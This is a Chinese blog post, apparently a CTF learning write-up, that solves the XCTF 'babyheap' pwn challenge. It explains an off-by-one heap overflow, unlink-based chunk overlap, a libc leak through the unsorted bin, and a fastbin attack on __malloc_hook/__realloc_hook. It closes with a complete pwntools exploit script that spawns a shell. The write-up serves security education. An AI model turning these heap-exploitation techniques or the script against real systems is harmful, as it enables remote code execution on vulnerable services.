<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="browsermode" content="application">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-title" content="Axojhf的博客">
<meta name="apple-mobile-web-app-status-bar-style" content="default">
<meta name="msapplication-navbutton-color" content="#666666">
<meta name= "format-detection" content="telephone=no" />





  <meta name="keywords" content="Writeup, nlvi" />


<link rel="apple-touch-startup-image" media="(device-width: 375px)" href="assets/apple-launch-1125x2436.png">
<link rel="apple-touch-startup-image" media="(orientation: landscape)" href="assets/apple-touch-startup-image-2048x1496.png">

<link rel="stylesheet" href="/blog/style/style.css">

<script>
  var nlviconfig = {
    title: "Axojhf的博客",
    author: "Axojhf",
    baseUrl: "/blog/",
    theme: {
      scheme: "banderole",
      lightbox: true,
      animate: true,
      search: true,
      friends: false,
      reward: false,
      pjax: false,
      lazy: false,
      toc: true
    }
  }
</script>




    
<link rel="stylesheet" href="/blog/script/lib/lightbox/css/lightbox.min.css">





    
<link rel="stylesheet" href="/blog/syuanpi/syuanpi.min.css">
















<style>
@font-face {
  font-family: "Allura";
  src: url('/blog/font/allura/allura.ttf');
}
</style>

  <title> 攻防世界-babyheap题Writeup · Axojhf的博客 </title>
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
  <div class="container">
    <header class="header" id="header">
  <div class="header-wrapper">
    <div class="logo">
  <div class="logo-inner syuanpi tvIn" style="display:none;">
    <h1><a href="/blog/">Axojhf的博客</a></h1>
    
  </div>
</div>

    <nav class="main-nav">
  
  <ul class="main-nav-list syuanpi tvIn">
  
    <li class="menu-item">
      <a href="javascript:;" id="search-btn" aria-label="Search">
        <i class="iconfont icon-search"></i>
      </a>
    </li>
  
  
  
    
  
    <li class="menu-item">
      <a href="/blog/" id="article">
        <span class="base-name">
          
            ARTICLE
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/archives" id="archives">
        <span class="base-name">
          
            ARCHIVES
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="javascript:;" id="tags">
        <span class="base-name">
          
            TAGS
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/about" id="about">
        <span class="base-name">
          
            ABOUT
          
        </span>
      </a>
    </li>
  
  
  </ul>
  
</nav>

  </div>
</header>
<div class="mobile-header" id="mobile-header">
  <div class="mobile-header-nav">
    <div class="mobile-header-item" id="mobile-left">
      <div class="header-menu-item">
        <div class="header-menu-line"></div>
      </div>
    </div>
    <h1 class="mobile-header-title">
      <a href="/">Axojhf的博客</a>
    </h1>
    <div class="mobile-header-item"></div>
  </div>
  <div class="mobile-header-body">
    <ul class="mobile-header-list">
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-0">
          <a href="/blog/" >
            
              ARTICLE
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-1">
          <a href="/blog/archives" >
            
              ARCHIVES
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-2">
          <a href="javascript:;" id="mobile-tags">
            
              TAGS
            
          </a>
        </li>
      
        <li class="mobile-nav-item syuanpi fadeInRightShort back-3">
          <a href="/blog/about" >
            
              ABOUT
            
          </a>
        </li>
      
    </ul>
  </div>
</div>



    <div class="container-inner" style="display:none;">
      <main class="main" id="main">
        <div class="main-wrapper">
          
    
  
  <article class="
  post
   is_post 
  ">
    <header class="post-header">
      <div class="post-time syuanpi fadeInRightShort back-1">
        <div class="post-time-wrapper">
          
          <time>2020-06-09</time>
          
        </div>
      </div>
      <h2 class="post-title syuanpi fadeInRightShort back-2">
        
          攻防世界-babyheap题Writeup
        
      </h2>
    </header>
    <div class="post-content syuanpi fadeInRightShort back-3">
      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本文中部分IDA反编译代码中的函数已被改名</p>
<p>本文参考 <a href="https://blog.csdn.net/seaaseesa/article/details/103173435" target="_blank" rel="noopener">攻防世界PWN之Babyheap(null off by one)题解</a></p>
<p>(博主还是菜鸟，有些知识可能理解不够透彻，有些表述可能不够严谨，欢迎大家指正，望大家多多包涵)</p>
<a id="more"></a>

<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><p><img src="image-20200610212548326.png" alt="image-20200610212548326"></p>
<p>程序信息</p>
<p><img src="image-20200609141759104.png" alt="image-20200609141759104"></p>
<p>应该是关于堆的菜单题，但是考虑到我还没有碰到攻防世界Pwn题用glibc 2.27的情况（一般都是Ubuntu 16.04环境下），所以应该与tcache无关<br>main函数里就是转换输入字符串为整数，然后对1，2，3，4四种数字做跳转到对应函数的处理</p>
<p>删除函数存在数组越界的漏洞，但是好像没有UAF漏洞（之后解题没有用到这里的漏洞）</p>
<p><img src="image-20200609143740530.png" alt="image-20200609143740530"></p>
<p>本来应该只能Create 7次</p>
<p><img src="image-20200609144136998.png" alt="image-20200609144136998"></p>
<p>Create的函数里读取输入信息的函数出现了Off-By-One漏洞<img src="image-20200609144510019.png" alt="image-20200609144510019"></p>
<p>到这里基本思路明确了，就是利用Off-By-One漏洞修改下一个malloc_chunk的size位的信息再触发unlink</p>
<blockquote>
<h2 id="off-by-one-利用思路"><a href="#off-by-one-利用思路" class="headerlink" title="off-by-one 利用思路"></a><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/off_by_one-zh/#off-by-one_2" target="_blank" rel="noopener">off-by-one 利用思路</a></h2><ol>
<li>溢出字节为可控制任意字节：通过修改大小造成块结构之间出现重叠，从而泄露其他块数据，或是覆盖其他块数据。也可使用 NULL 字节溢出的方法</li>
<li>溢出字节为 NULL 字节：在 size 为 0x100 的时候，溢出 NULL 字节可以使得 <code>prev_in_use</code> 位被清，这样前块会被认为是 free 块。（1） 这时可以选择使用 unlink 方法（见 unlink 部分）进行处理。（2） 另外，这时 <code>prev_size</code> 域就会启用，就可以伪造 <code>prev_size</code> ，从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 <code>prev_size</code> 找到的块的大小与<code>prev_size</code> 是否一致。</li>
</ol>
</blockquote>
<p>因为在堆里泄露libc基址一般是利用unsorted bin，而在这里没有UAF漏洞，所以需要想办法在不直接free相关chunk的情况下得到<code>main_arena+88</code>的地址数据，这里我搞不明白，还是看了大佬的Writeup才知道思路。</p>
<p>这里就是把之前分配的许多chunk利用Off-By-One漏洞合并到一起，然后精确地再从合并后的unsorted bin里分配一些出来，使<code>main_arena+88</code>的值正好在以前create函数申请的空间里。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create(<span class="number">0x100</span>, <span class="string">'0'</span> * <span class="number">0x100</span>)  <span class="comment"># 用于与4进行unlink		0号chunk</span></span><br><span class="line">create(<span class="number">0x10</span>, <span class="string">'1'</span> * <span class="number">0x10</span>)  <span class="comment"># 重新申请0x100空间后泄露libc相关地址			1号chunk</span></span><br><span class="line">create(<span class="number">0x68</span>, <span class="string">'2'</span> * <span class="number">0x68</span>)  <span class="comment"># fastbin attack攻击__malloc_hook和__realloc_hook	2号chunk</span></span><br><span class="line">create(<span class="number">0x18</span>, <span class="string">'3'</span> * <span class="number">0x18</span>)  <span class="comment"># 做off-by-one攻击			3号chunk</span></span><br><span class="line">create(<span class="number">0x100</span>, <span class="string">'4'</span> * (<span class="number">0x100</span> - <span class="number">0x10</span>) + p64(<span class="number">0x100</span>) + p64(<span class="number">0x11</span>))  <span class="comment"># 为了使off-by-one攻击正常，需要在4后面伪造一个chunk			4号chunk</span></span><br></pre></td></tr></table></figure>

<p>这里3号chunk之后需要释放再申请一次，这样就可以将第一次申请3号chunk之后申请的4号chunk的<code>size位</code>从<code>0x110改为0x100</code>，由于4号chunk的<code>size位</code>之后被改为了<code>0x100</code>，而进行unlink时会对该chunk的下一个chunk的<code>prev_size</code>位进行检测，所以需要在4号chunk的结尾处伪造一个chunk来使unlink顺利进行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">delete(<span class="number">3</span>)  <span class="comment"># off-by-one</span></span><br><span class="line">delete(<span class="number">2</span>)  <span class="comment"># fastbin attack</span></span><br><span class="line">delete(<span class="number">0</span>)  <span class="comment"># unlink</span></span><br><span class="line">create(<span class="number">0x18</span>, <span class="string">'1'</span> * <span class="number">0x10</span> + p64(<span class="number">0x1c0</span>))  <span class="comment"># off-by-one攻击，使用0号位，3号chunk</span></span><br><span class="line">delete(<span class="number">4</span>)  <span class="comment"># 进行unlink</span></span><br><span class="line">create(<span class="number">0x100</span>, <span class="string">'0'</span> * <span class="number">0x100</span>)  <span class="comment"># 重新申请0x100字节数据</span></span><br><span class="line">show()  <span class="comment"># 泄露main_arena+88的地址</span></span><br></pre></td></tr></table></figure>

<p>这里首先释放3，2，0三个chunk，然后再对3号chunk再分配（其中0x1c0代表前面0到3号chunk所占的字节数，这样就可以用unlink将5个chunk都合并在一起），之后申请0x100大小的空间就可以将<code>main_arena+88</code>的地址信息恰好放在1号chunk数据段内，然后只要将<code>1 :</code>之后的6个字节的数据收集一些就可以算出libc基址</p>
<p>（这里最初泄露的只有<code>main_arena</code>的地址，而这个地址不好拿去找libc的基址，但是因为<code>malloc_hook</code>的地址和<code>main_arena</code>的地址非常接近<img src="QQ%E6%88%AA%E5%9B%BE20200610174828.jpg" alt="QQ截图20200610174828">，所以可以先算出<code>malloc_hook</code>的地址再去找libc基址）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">create(<span class="number">0x100</span>, <span class="string">'1'</span> * <span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x71</span>) + p64(malloc_hook_add - <span class="number">0x23</span>) + <span class="string">'\n'</span>)	<span class="comment">#⑴</span></span><br><span class="line">create(<span class="number">0x68</span>, <span class="string">'5'</span> * <span class="number">0x68</span>)</span><br><span class="line">create(<span class="number">0x68</span>, <span class="string">'6'</span> * <span class="number">0xb</span> + p64(one_gadget_add) + p64(realloc_add + <span class="number">2</span>) + <span class="string">'\n'</span>)</span><br></pre></td></tr></table></figure>

<p>之后就是利用fastbin attack来修改<code>malloc_hook</code>的数据，从而达到执行one_gadget的目的。</p>
<p>这里依然是继续从合并后的chunk中再分配chunk，之前<code>delete(2)</code>就是让0x70大小的chunk进入fastbin里，这样㈠中就能修改<code>fd</code>的数据，达到使用fastbin attack的作用。</p>
<p>这里大佬的Writeup里说不能直接修改<code>malloc_hook</code>的地址，需要使用realloc函数来调整栈的数据</p>
<blockquote>
<p>一种很巧妙的利用方法。有些情况下one_gadget因为环境原因全部都不可用，这时可以通过realloc_hook来调整堆栈环境使one_gadget可用。<br>realloc函数在函数起始会检查realloc_hook的值是否为0，不为0则跳转至realloc_hook指向地址。<br>realloc_hook同malloc_hook相邻，故可通过fastbin attack一同修改两个值。</p>
<p>将realloc_hook设置为选择好的one_gadget，将malloc_hook设置为realloc函数开头某一push寄存器处。push和pop的次数是一致的，若push次数减少则会压低堆栈，改变栈环境。这时one_gadget就会可以使用。具体要压低栈多少要根据环境决定，这里我们可以进行小于48字节内或72字节的堆栈调整。</p>
<p>来源：<a href="https://bbs.pediy.com/thread-246786.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-246786.htm</a></p>
</blockquote>
<p>最终的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'220.249.52.133'</span>, <span class="number">00000</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create</span><span class="params">(size, data)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'choice :'</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'Size: '</span>, str(size))</span><br><span class="line">    p.sendafter(<span class="string">'Data: '</span>, data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(index)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'choice :'</span>, <span class="string">'2'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'Index: '</span>, str(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">()</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'choice :\n'</span>, <span class="string">'3'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">create(<span class="number">0x100</span>, <span class="string">'0'</span> * <span class="number">0x100</span>)  <span class="comment"># 用于与4进行unlink</span></span><br><span class="line">create(<span class="number">0x10</span>, <span class="string">'1'</span> * <span class="number">0x10</span>)  <span class="comment"># 重新申请0x100空间后泄露libc相关地址</span></span><br><span class="line">create(<span class="number">0x68</span>, <span class="string">'2'</span> * <span class="number">0x68</span>)  <span class="comment"># fastbin attack攻击__malloc_hook和__realloc_hook</span></span><br><span class="line">create(<span class="number">0x18</span>, <span class="string">'3'</span> * <span class="number">0x18</span>)  <span class="comment"># 做off-by-one攻击</span></span><br><span class="line">create(<span class="number">0x100</span>, <span class="string">'4'</span> * (<span class="number">0x100</span> - <span class="number">0x10</span>) + p64(<span class="number">0x100</span>) + p64(<span class="number">0x11</span>))  <span class="comment"># 为了使off-by-one攻击正常，需要在4后面伪造一个chunk</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">3</span>)  <span class="comment"># off-by-one</span></span><br><span class="line">delete(<span class="number">2</span>)  <span class="comment"># fastbin attack</span></span><br><span class="line">delete(<span class="number">0</span>)  <span class="comment"># unlink</span></span><br><span class="line">create(<span class="number">0x18</span>, <span class="string">'1'</span> * <span class="number">0x10</span> + p64(<span class="number">0x1c0</span>))  <span class="comment"># off-by-one攻击，使用0号位，3号chunk</span></span><br><span class="line">delete(<span class="number">4</span>)  <span class="comment"># 进行unlink</span></span><br><span class="line">create(<span class="number">0x100</span>, <span class="string">'0'</span> * <span class="number">0x100</span>)  <span class="comment"># 重新申请0x100字节数据</span></span><br><span class="line">show()  <span class="comment"># 泄露main_arena+88的地址</span></span><br><span class="line">p.recvuntil(<span class="string">'1 : '</span>)</span><br><span class="line">main_arena = u64(p.recv(<span class="number">6</span>) + <span class="string">'\x00\x00'</span>) - <span class="number">88</span></span><br><span class="line"></span><br><span class="line">libc_base = main_arena - <span class="number">0x10</span> - <span class="number">0x3c4b10</span></span><br><span class="line">realloc_add = libc_base + <span class="number">0x846c0</span></span><br><span class="line">one_gadget_add = libc_base + <span class="number">0x4526a</span></span><br><span class="line">malloc_hook_add = main_arena - <span class="number">0x10</span></span><br><span class="line">log.info(hex(libc_base))</span><br><span class="line"></span><br><span class="line">create(<span class="number">0x100</span>, <span class="string">'1'</span> * <span class="number">0x10</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x71</span>) + p64(malloc_hook_add - <span class="number">0x23</span>) + <span class="string">'\n'</span>)</span><br><span class="line">create(<span class="number">0x68</span>, <span class="string">'5'</span> * <span class="number">0x68</span>)</span><br><span class="line">create(<span class="number">0x68</span>, <span class="string">'6'</span> * <span class="number">0xb</span> + p64(one_gadget_add) + p64(realloc_add + <span class="number">2</span>) + <span class="string">'\n'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'choice :'</span>, <span class="string">'1'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'Size: '</span>, <span class="string">'0'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>这道题是我写过的第一个与Off-By-One漏洞有关的题，而且其中还牵扯到了fastbin attack，unlink，等等，对我来说综合性有点大，我还是在看了大佬的Writeup之后才知道思路。</p>
<p>本题主要是要会思考怎样去利用<code>常规的fastbin attack，通过unsorted bin泄露libc基址</code>的方法，而核心是要会Off-By-One的利用，使得没有UAF的情况下也能达到目标，当然利用<code>realloc</code>和<code>realloc_hook</code>来调整堆栈也是让我长知识了。</p>

      
    
    </div>
    
      <div class="post-tags syuanpi fadeInRightShort back-3">
      
        <a href="/blog/tags/Writeup/">Writeup</a>
      
      </div>
    
    
      

      
  <hr class="copy-line">
  <div class="post-copyright">
    <div class="copy-author">
      <span>作者 :</span>
      <span>Axojhf</span>
    </div>
    <div class="copy-url">
      <span>地址 :</span>
      <a href="http://xiaoaoaode.gitee.io/blog/2020/06/09/7b438d60/">http://xiaoaoaode.gitee.io/blog/2020/06/09/7b438d60/</a>
    </div>
    <div class="copy-origin">
      <span>来源 :</span>
      <a href="http://xiaoaoaode.gitee.io/blog">http://xiaoaoaode.gitee.io/blog</a>
    </div>
    <div class="copy-license">
      
      著作权归作者所有，转载请联系作者获得授权。
    </div>
  </div>

    
  </article>
  
    
  <nav class="article-page">
    
      <a href="/blog/2020/06/10/928398a1/" id="art-left" class="art-left">
        <span class="next-title">
          <i class="iconfont icon-left"></i>攻防世界-"实时数据监测"题Writeup
        </span>
      </a>
    
    
      <a href="/blog/2020/06/02/a54507f8/" id="art-right" class="art-right">
        <span class="prev-title">
          攻防世界——dice_game题Writeup<i class="iconfont icon-right"></i>
        </span>
      </a>
    
  </nav>


    
  <i id="com-switch" class="iconfont icon-down jumping-in long infinite" style="font-size:24px;display:block;text-align:center;transform:rotate(180deg);"></i>
  <div class="post-comments" id="post-comments" style="display: block;margin: auto 16px;">
    

    
    

    

  </div>



  
  
    
  
  <aside class="post-toc">
    <div class="title"><span>文章导航</span></div>
    <div class="toc-inner">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#正文"><span class="toc-text">正文</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#off-by-one-利用思路"><span class="toc-text">off-by-one 利用思路</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-text">总结</span></a></li></ol>
    </div>
  </aside>



  


        </div>
      </main>
      <footer class="footer syuanpi fadeIn" id="footer">
  <hr>
  <div class="footer-wrapper">
    <div class="left">
      <div class="contact-icon">
  
  
</div>

    </div>
    <div class="right">
      <div class="copyright">
    <div class="info">
        <span>&copy;</span>
        <span>2020 ~ 2020</span>
        <span>❤</span>
        <span>Axojhf</span>
    </div>
    <div class="theme">
        <span>
            动力来源于
            <a href="http://hexo.io/" target="_blank" rel="noopener">Hexo </a>
        </span>
        <span>
            主题
            <a href="https://github.com/ColMugX/hexo-theme-Nlvi" target="_blank" rel="noopener"> Nlvi </a>
        </span>
    </div>
    
</div>

    </div>
  </div>
</footer>
    </div>
    <div class="tagcloud" id="tagcloud">
  <div class="tagcloud-taglist">
  
    <div class="tagcloud-tag">
      <button>Writeup</button>
    </div>
  
    <div class="tagcloud-tag">
      <button>其他</button>
    </div>
  
    <div class="tagcloud-tag">
      <button>知识点记录</button>
    </div>
  
  </div>
  
    <div class="tagcloud-postlist active">
      <h2>Writeup</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/27/dd14f23d/">
            <time class="tagcloud-posttime">2020 / 07 / 27</time>
            <span>BUUCTF-Pwn题-Writeup（1）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/28/cfa15dd3/">
            <time class="tagcloud-posttime">2020 / 07 / 28</time>
            <span>BUUCTF-Pwn题-Writeup（2）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/16/771d3ab6/">
            <time class="tagcloud-posttime">2020 / 08 / 16</time>
            <span>BUUCTF-Pwn题-Writeup（3）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/19/5276656a/">
            <time class="tagcloud-posttime">2020 / 08 / 19</time>
            <span>BUUCTF-Pwn题-Writeup（5）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/17/eaca020f/">
            <time class="tagcloud-posttime">2020 / 08 / 17</time>
            <span>BUUCTF-Pwn题-Writeup（4）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/21/f87fade1/">
            <time class="tagcloud-posttime">2020 / 09 / 21</time>
            <span>BUUCTF-Pwn题-Writeup（7）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/04/40c3ca84/">
            <time class="tagcloud-posttime">2020 / 09 / 04</time>
            <span>BUUCTF-Pwn题-Writeup（6）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/09/28/a01cbdb7/">
            <time class="tagcloud-posttime">2020 / 09 / 28</time>
            <span>BUUCTF-Pwn题-Writeup（8）</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/31/2253bdbe/">
            <time class="tagcloud-posttime">2020 / 08 / 31</time>
            <span>DASCTF2020八月赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/26/253f1adb/">
            <time class="tagcloud-posttime">2020 / 07 / 26</time>
            <span>DASCTF七月赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/24/49582296/">
            <time class="tagcloud-posttime">2020 / 08 / 24</time>
            <span>CISCN2020初赛个人Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/01/14185/">
            <time class="tagcloud-posttime">2020 / 06 / 01</time>
            <span>我写出来的招新题的Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/17/45ae5a23/">
            <time class="tagcloud-posttime">2020 / 06 / 17</time>
            <span>攻防世界-“250”题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/09/7b438d60/">
            <time class="tagcloud-posttime">2020 / 06 / 09</time>
            <span>攻防世界-babyheap题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/17/47cfb24f/">
            <time class="tagcloud-posttime">2020 / 06 / 17</time>
            <span>攻防世界-“Recho”题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/12/e563c85c/">
            <time class="tagcloud-posttime">2020 / 07 / 12</time>
            <span>攻防世界-magic题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/10/07/9b619749/">
            <time class="tagcloud-posttime">2020 / 10 / 07</time>
            <span>攻防世界-nobug题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/02/471a08d2/">
            <time class="tagcloud-posttime">2020 / 06 / 02</time>
            <span>攻防世界--supermarket题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/10/04/77eb8480/">
            <time class="tagcloud-posttime">2020 / 10 / 04</time>
            <span>攻防世界-onemanarmy题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/02/a54507f8/">
            <time class="tagcloud-posttime">2020 / 06 / 02</time>
            <span>攻防世界——dice_game题Writeup</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/06/10/928398a1/">
            <time class="tagcloud-posttime">2020 / 06 / 10</time>
            <span>攻防世界-"实时数据监测"题Writeup</span>
          </a>
        </div>
      
    </div>
  
    <div class="tagcloud-postlist ">
      <h2>其他</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/07/38a4c9bb/">
            <time class="tagcloud-posttime">2020 / 08 / 07</time>
            <span>Pwn环境的搭建和解答一些简单Pwn题的分享</span>
          </a>
        </div>
      
    </div>
  
    <div class="tagcloud-postlist ">
      <h2>知识点记录</h2>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/10/44355a63/">
            <time class="tagcloud-posttime">2020 / 08 / 10</time>
            <span>_IO_FILE结构与fread函数知识点小结</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/08/01/8e1ab4ab/">
            <time class="tagcloud-posttime">2020 / 08 / 01</time>
            <span>Pwn题里有关seccomp和prctl函数的知识点小结</span>
          </a>
        </div>
      
        <div class="tagcloud-post">
          <a href="/blog/2020/07/19/5cfa9d84/">
            <time class="tagcloud-posttime">2020 / 07 / 19</time>
            <span>正则表达式学习1</span>
          </a>
        </div>
      
    </div>
  
</div>

  </div>
  <div class="backtop syuanpi melt toTop" id="backtop">
    <i class="iconfont icon-up"></i>
    <span style="text-align:center;font-family:Georgia;"><span style="font-family:Georgia;" id="scrollpercent">1</span>%</span>
</div>

  <div class="search" id="search">
    <div class="input">
      <input type="text" id="search-input" placeholder="搜索一下？" autofocus>
    </div>
    <div id="search-result"></div>
  </div>



<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>



  <script></script>
  <script src="/blog/script/lib/lightbox/js/lightbox.min.js" async></script>











  
<script src="/blog/script/scheme/banderole.js"></script>




<script src="/blog/script/bootstarp.js"></script>



<script>
if (nlviconfig.theme.toc) {
  setTimeout(function() {
    if (nlviconfig.theme.scheme === 'balance') {
      $("#header").addClass("show_toc");
    } else if (nlviconfig.theme.scheme === 'banderole') {
      $(".container-inner").addClass("has_toc");
      $(".post-toc .title").addClass("show");
      $(".toc-inner").addClass("show");
    }
  }, 1000);
}
</script>



</body>
</html>
